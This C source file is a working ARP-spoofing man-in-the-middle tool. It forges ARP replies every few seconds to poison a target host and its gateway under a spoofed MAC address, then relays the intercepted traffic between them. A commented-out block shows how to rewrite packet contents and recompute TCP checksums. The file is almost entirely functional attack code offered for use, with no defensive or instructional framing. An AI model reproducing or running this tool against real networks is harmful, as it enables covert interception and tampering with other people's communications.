#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <ifret.h>
#include <pcap.h>
#include <nl_ip.h>
#include <nl_arp.h>
#include <dl_ether.h>
#include <tl_tcp.h>
#include <signal.h>
#include <sys/ioctl.h>
#include <net/if.h>

#include <features.h>		/* for the glibc version number */

#if __GLIBC__ >= 2 && __GLIBC_MINOR >= 1
#include <netpacket/packet.h>
#include <net/ethernet.h>	/* the L2 protocols */

#else
#include <asm/types.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>	/* The L2 protocols */

#endif

// #include "ipv4.c"

#define MAX_PACKET 8192
#define MACBYTES(a) (a)[0],(a)[1],(a)[2],(a)[3],(a)[4],(a)[5]
#define FORMAT "[ %9s ] "
#define MACFMTS "%02x:%02x:%02x:%02x:%02x:%02x"

typedef unsigned char macaddr_t[6];

typedef struct netinfo_s
{
   char ifname[16];
   int ifindex;
   macaddr_t macaddr;
   struct in_addr ipaddr;
   struct in_addr netaddr;
   struct in_addr netmask;
}
netinfo_t;

int break_flag;
const int arpinterval = 5;

void sighandler(int sigio);
int mac_ttob(macaddr_t mac, char *macstring);
int Router(const macaddr_t gwmac, const macaddr_t dstmac,
	   const netinfo_t * netinfo, struct in_addr gwip,
	   struct in_addr dstip);
int ArpReply(int sd, struct sockaddr_ll sll, const macaddr_t smac,
	     const macaddr_t dmac, struct in_addr sip, struct in_addr dip);
int getmacaddr(const char *ifname, macaddr_t mac);
int getifindex(const char *ifname);

//////////////////////////////////////////////////////////////////////////
// main()
//////////////////////////////////////////////////////////////////////////

int
main(int argc, char **argv)
{
   macaddr_t gwmac, dstmac;
   struct in_addr gwip, dstip;
   netinfo_t ni;
   char buffer[2][20];

   setvbuf(stdout, NULL, _IONBF, 0);

   if (argc < 5) {
      printf("\nusage: %s gw_mac dst_mac gw_ip dst_ip [interface]\n\n",
	     *argv);
      exit(-1);
   }

   if (mac_ttob(gwmac, argv[1]) == -1) {
      puts("invalid gw_mac parameter");
      exit(-1);
   }

   if (mac_ttob(dstmac, argv[2]) == -1) {
      puts("invalid dst_mac parameter");
      exit(-1);
   }

   memset(&ni, 0, sizeof(ni));

   gwip.s_addr = inet_addr(argv[3]);
   dstip.s_addr = inet_addr(argv[4]);

   strcpy(ni.ifname, (argc > 5) ? argv[5] : "");

   // get standard interface information

   if (get_net_info
       (ni.ifname, sizeof(ni.ifname), &ni.ipaddr, &ni.netaddr,
	&ni.netmask) == -1) {
      perror("get_net_info()");
      exit(-1);
   }
   // get interface index

   ni.ifindex = getifindex(ni.ifname);
   if (ni.ifindex == -1) {
      perror("getifindex()");
      return (-1);
   }
   // get hardware address

   /* 

      if (getmacaddr(ni.ifname, ni.macaddr) == -1) { perror("getifindex()");
      exit(-1); }

    */

   // setup a false mac address with same oui as the gateway

   memcpy(ni.macaddr, gwmac, 3);
   memcpy(ni.macaddr + 3, "\x00\xde\xad", 3);

   strcpy(buffer[0], inet_ntoa(dstip));
   strcpy(buffer[1], inet_ntoa(gwip));

   fputc('\n', stderr);
   fprintf(stderr, FORMAT "%s\n", "interface", ni.ifname);
   fprintf(stderr, FORMAT MACFMTS " <--- " MACFMTS " ---> " MACFMTS "\n",
	   "datalink", MACBYTES(dstmac), MACBYTES(ni.macaddr),
	   MACBYTES(gwmac));
   fprintf(stderr, FORMAT "%s <---> %s\n", "network", buffer[0], buffer[1]);

   // route data
   Router(gwmac, dstmac, &ni, gwip, dstip);

   return (0);
}

//////////////////////////////////////////////////////////////////////////
// mac_ttob()
//////////////////////////////////////////////////////////////////////////

int
mac_ttob(macaddr_t mac, char *macstring)
{
   const char mac_fmtstring[] = "%x:%x:%x:%x:%x:%x";
   unsigned int m[6];
   int i, n;

   n = sscanf(macstring, mac_fmtstring, m, m + 1, m + 2, m + 3, m + 4, m + 5);
   if (n != 6) {
      perror("sscanf()");
      return (-1);
   }

   for (i = 0; i < 6; i++)
      mac[i] = (unsigned char)m[i];

   return (0);
}

//////////////////////////////////////////////////////////////////////////
// Router()
//////////////////////////////////////////////////////////////////////////

int
Router(const macaddr_t gwmac, const macaddr_t dstmac,
       const netinfo_t * netinfo, struct in_addr gwip, struct in_addr dstip)
{
   pcap_t *pd;
   char eb[PCAP_ERRBUF_SIZE], buffer[2][1024];
   struct bpf_program bpfprog;
   struct sockaddr_ll sll;
   netinfo_t ni;
   int sd;
   time_t ti;
   int ocnt, icnt, arpc;

   arpc = ocnt = icnt = 0;

   memcpy(&ni, netinfo, sizeof(ni));

   // route any ip packets sent to me but not my ip to gwmac

   pd = pcap_open_live(ni.ifname, MAX_PACKET, 1, 100, eb);
   if (!pd) {
      perror("pcap_open_live()");
      return (-1);
   }

   strcpy(buffer[0], inet_ntoa(dstip));
   strcpy(buffer[1], inet_ntoa(gwip));

   snprintf(eb, sizeof(eb), "ether dst " MACFMTS " and host %s",
	    MACBYTES(ni.macaddr), buffer[0]);

   fprintf(stderr, FORMAT "'%s'\n", "filter", eb);

   if (pcap_compile(pd, &bpfprog, eb, 0, ni.netmask.s_addr)) {
      pcap_close(pd);
      perror("pcap_compile()");
      return (-1);
   }

   if (pcap_setfilter(pd, &bpfprog)) {
      pcap_close(pd);
      perror("pcap_setfilter()");
      return (-1);
   }

   sd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
   if (sd == -1) {
      pcap_close(pd);
      perror("socket()");
      return (-1);
   }

   memset(&sll, 0, sizeof(sll));
   sll.sll_family = AF_PACKET;
   sll.sll_ifindex = ni.ifindex;
   sll.sll_protocol = htons(ETH_P_ALL);

   if (bind(sd, (struct sockaddr *)&sll, sizeof(sll)) == -1) {
      perror("bind()");
      pcap_close(pd);
      close(sd);
      return (-1);
   }

   signal(SIGINT, sighandler);
   signal(SIGTERM, sighandler);

   ti = time(NULL) - arpinterval - 1;

   for (break_flag = 0; !break_flag;) {
      const unsigned char *packet;
      struct pcap_pkthdr phdr;
      struct ip ip;
      struct ether_header eth;
      char newpacket[MAX_PACKET];
      int n;

      if (time(NULL) - ti > arpinterval) {

	 arpc++;

	 // Man-In-The-Middle every few seconds
	 ArpReply(sd, sll, ni.macaddr, dstmac, gwip, dstip);
	 ArpReply(sd, sll, ni.macaddr, gwmac, dstip, gwip);
	 ti = time(NULL);

      }

      packet = pcap_next(pd, &phdr);
      if (!packet)
	 continue;

      if (phdr.caplen != phdr.len) {
	 puts("packet length mismatch");
      }

      memcpy(&eth, packet, 14);
      memcpy(&ip, packet + 14, sizeof(ip));

      if (!memcmp(eth.ether_shost, gwmac, ETHER_ADDR_LEN)) {

	 // from gateway to target
	 icnt++;

	 memcpy(eth.ether_dhost, dstmac, ETHER_ADDR_LEN);
	 sll.sll_halen = ETHER_ADDR_LEN;
	 memcpy(sll.sll_addr, dstmac, ETHER_ADDR_LEN);

      } else if (!memcmp(eth.ether_shost, dstmac, ETHER_ADDR_LEN)) {

	 // from target to gateway
	 ocnt++;

	 memcpy(eth.ether_dhost, gwmac, ETHER_ADDR_LEN);
	 sll.sll_halen = ETHER_ADDR_LEN;
	 memcpy(sll.sll_addr, gwmac, ETHER_ADDR_LEN);

      }

      memcpy(eth.ether_shost, ni.macaddr, ETHER_ADDR_LEN);

      memcpy(newpacket, packet, phdr.len);
      memcpy(newpacket, &eth, 14);

      /* 

         if(memmem(newpacket + 14, phdr.len - 14, "cnn", 3)) { int offset;
         int tcplen; struct tcphdr tcp; puts("found"); offset = 14 + ip.ip_hl 
         * 4; memcpy((void*)memmem(newpacket, phdr.len, "cnn", 3), "666", 3);
         memcpy(&tcp, newpacket + offset, sizeof(tcp)); tcplen = tcp.th_off *
         4; printf("checksum: %x\n", tcp.th_sum); tcp.th_sum = 0;
         memcpy(newpacket + offset, &tcp, sizeof(tcp)); tcp.th_sum =
         tcp_cksum(newpacket + offset, phdr.len - offset, ip.ip_src,
         ip.ip_dst); printf("checksum: %x\n", tcp.th_sum); memcpy(newpacket +
         offset, &tcp, sizeof(tcp)); } */

      printf("\r" FORMAT "incoming %i outgoing %i arp updates %i", "status",
	     icnt, ocnt, arpc);

      n =
	 sendto(sd, newpacket, phdr.len, 0, (struct sockaddr *)&sll,
		sizeof(sll));
      if (n != phdr.len)
	 perror("sendto()");
   }

   printf("\n" FORMAT "%s\n", "signal", "exiting");

   ArpReply(sd, sll, gwmac, dstmac, gwip, dstip);
   ArpReply(sd, sll, dstmac, gwmac, dstip, gwip);

   pcap_close(pd);
   close(sd);
   return (0);
}

//////////////////////////////////////////////////////////////////////////
// sighandler()
//////////////////////////////////////////////////////////////////////////

void
sighandler(int sigio)
{
   break_flag = 1;
}

//////////////////////////////////////////////////////////////////////////
// ArpReply()
//////////////////////////////////////////////////////////////////////////

int
ArpReply(int sd, struct sockaddr_ll sll, const macaddr_t smac,
	 const macaddr_t dmac, struct in_addr sip, struct in_addr dip)
{
   struct ether_header eth;
   struct ether_arp arp;
   char buffer[sizeof(eth) + sizeof(arp)];
   int n;

   memcpy(eth.ether_shost, smac, ETHER_ADDR_LEN);
   memcpy(eth.ether_dhost, dmac, ETHER_ADDR_LEN);
   eth.ether_type = htons(ETH_P_ARP);

   memcpy(arp.arp_sha, smac, ETHER_ADDR_LEN);
   memcpy(arp.arp_tha, dmac, ETHER_ADDR_LEN);

   memcpy(arp.arp_spa, &sip, sizeof(struct in_addr));
   memcpy(arp.arp_tpa, &dip, sizeof(struct in_addr));

   arp.arp_hrd = htons(ARPHRD_ETHER);
   arp.arp_pro = htons(ETH_P_IP);
   arp.arp_hln = ETHER_ADDR_LEN;
   arp.arp_pln = sizeof(struct in_addr);
   arp.arp_op = htons(ARPOP_REPLY);

   memcpy(buffer, &eth, 14);
   memcpy(buffer + 14, &arp, sizeof(arp));

   sll.sll_halen = ETHER_ADDR_LEN;
   memcpy(sll.sll_addr, dmac, ETHER_ADDR_LEN);

   n =
      sendto(sd, buffer, sizeof(buffer), 0, (struct sockaddr *)&sll,
	     sizeof(sll));
   if (n != sizeof(buffer))
      perror("sendto()");

   return (0);
}

//////////////////////////////////////////////////////////////////////////
// ArpReply()
//////////////////////////////////////////////////////////////////////////

int
getmacaddr(const char *ifname, macaddr_t mac)
{
   struct ifreq iff;
   int sd;

   sd = socket(AF_INET, SOCK_DGRAM, 0);
   if (sd == -1)
      return (-1);

   strcpy(iff.ifr_name, ifname);

   if (ioctl(sd, SIOCGIFHWADDR, &iff)) {
      close(sd);
      return (-1);
   }

   close(sd);

   memcpy(mac, (char *)&iff.ifr_addr + 2, ETHER_ADDR_LEN);

   return (0);
}

//////////////////////////////////////////////////////////////////////////
// getifindex()
//////////////////////////////////////////////////////////////////////////

int
getifindex(const char *ifname)
{
   int sd;
   struct ifreq ifr;

   sd = socket(AF_INET, SOCK_DGRAM, 0);
   if (sd == -1)
      return (-1);

   ifr.ifr_ifindex = 0;
   strcpy(ifr.ifr_name, ifname);

   if (ioctl(sd, SIOGIFINDEX, &ifr) == -1) {
      close(sd);
      return (-1);
   }

   close(sd);

   return (ifr.ifr_ifindex);
}
